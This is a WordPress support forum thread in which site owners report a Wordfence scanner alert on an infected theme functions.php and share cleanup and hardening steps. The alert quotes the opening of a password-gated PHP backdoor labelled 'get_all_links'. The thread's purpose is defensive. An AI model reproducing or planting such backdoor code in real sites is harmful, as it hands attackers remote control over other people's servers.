Attack

Further to my last, here is what WF is reporting :

File appears to be malicious: wp-content/themes/accesspress-store/functions.php
Filename: wp-content/themes/accesspress-store/functions.php
File type: Not a core, theme or plugin file.
Issue first detected: 1 min ago.
Severity: Critical
Status New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “<?php\x0a\x0aif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘9567573b5a1ccfe552821463c81e6437’))\x0a\x09{\x0a\x09\x09switch ($_REQUEST[‘action’])\x0a\x09\x09\x09{\x0a\x09\x09\x09\x09case ‘get_all_links'”. The infection type is: Backdoor:PHP/get_all_links.

So should I replace/restore ‘functions.php’ with the original file?

Thanks

The same here. All sites infected. Please help! Thanks.

@sahulap

It seems that the theme was hacked and a uploaded malicious file,

This is what I did to resolve the matter :

(This is really easy to do, simply follow the steps)

1) Made sure I had a backup,

2) DO NOT DELETE DATABASE

3) Deleted/Backed up plugins and uploads dir,

4) Deleted WP and did a fresh install – DO THIS FROM YOUR CPANEL and NOT ftp!

5) Uploaded the original theme,

Then …

1) Changed the database details in ‘config.php’ to reflect the database, replacing the new WP database details that it created when I did a new install.

2) Install WF but then check the options and check ‘remove tables’ then ‘deactivate’ it so it removes ‘existing’ wf tables. Then, reactivate it to create ‘new’ tables.

3) Now, I discovered a clever function in WF – in options, look for ‘Disable Code Execution for Uploads directory’ at the button and ‘check’ it. This is where I believe the malicious code was added.

By checking ‘Disable Code Execution for Uploads directory’ this will stop and code from being executed.

4) Put the uploads dir back in replacing new one,

5) Uploaded the plugins dir then one by one, activate and check that its ok and do this for the rest.

6) When you setup WF, make sure you also setup the ‘firewall’ correctly although at the time of writing, its a bugger to get this to work right with .htaccess file.

7) Run a WF ‘complete’ scan

Done!

Worked for me!

HTH

• This reply was modified 8 years ago by Rik0399.

I would add to that list:

– scan your local machine for malware
– check and remove any unknown administrator level users in the WordPress dashboard >> Users and/or in the database
– change *all* passwords (WordPress dashboard/cPanel/MYSQL database) for unique strong versions (15-20 characters) that include special characters such as: (*&^%￡:@_+
– change your salt keys in your wp-config.php file to log out all existing users

@barnez

Agreed ??

Hi @rik0399
Glad to hear that you managed to clean your website from this infection, I just want to let you know that we had a guide regarding “How to Clean a Hacked WordPress Site using Wordfence” which is too close to what you have done here, also it’s worth to to take a look at “How to Harden Your WordPress Site From Attacks” for some great tips that could prevent this attack from happening again, some of these tips were already mentioned by @pidengmor “thanks!”.

Thanks.

Thank you very much for your help.

Same issue. I compared to a normal functions.php file that and you see the code on top of the suspicious file is actually not supposed to be there.

I also deleted wp-cd.php files (as godaddy rightly pointed) and removed the top one php line in post.php (also flagged by wp)

What I could not figure yet is what caused the breach?
All the functions.php files in one hosting account were affected, including the non-active themes. I’ve fixed it for now but want to secure it for the future.